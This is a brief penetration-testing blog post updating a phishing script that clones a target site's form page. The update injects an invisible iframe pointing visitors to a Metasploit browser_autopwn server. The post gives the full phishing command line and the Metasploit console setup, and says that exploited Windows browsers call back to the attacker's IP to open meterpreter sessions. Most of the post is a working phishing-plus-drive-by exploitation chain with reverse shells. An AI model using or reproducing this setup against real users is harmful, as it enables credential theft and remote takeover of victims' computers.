Adventures in Penetration Testing: Let’s Go Phishing – Update

Please see the original article for more information about this phishing script. This is just a minor update to some functionality that I added over the weekend. I haven’t hooked BeEF in yet, but I have added Metasploit, which can be nice.

The updated version, which can be found here, can be tied into Metasploit’s browser_autopwn module. For more information about the module, see a good little write up here.

I’ve added an option that will add an invisible iframe to the bottom of whatever page you are phishing that points to whatever IP or FQDN on which you want to run the browser_autopwn module.

Example:

  python gophish.py --phish https://<victimsite>/path/to/form/page 
    --replace https://<phishinghost> --port 443 --ssl \ 
    --sslcert ssl.crt --sslkey ssl.key --sslchain chain.crt \
    --autopwn http://<MetasploitAutopwnHost>/<autopwnuri>

 
The setup on the Metasploit host would be:

  use auxiliary/server/browser_autopwn
  set SRVHOST <AttackerIP>
  set SRVPORT 80
  set URIPATH /
  set LPORT_WIN32 443
  run

 
This will start up the listener on port 80, running on whatever IP you set as <AttackerIP>, with a URI of ‘/’, and any successful Windows exploits will call back to your <AttackerIP> on port 443 to establish a meterpreter session.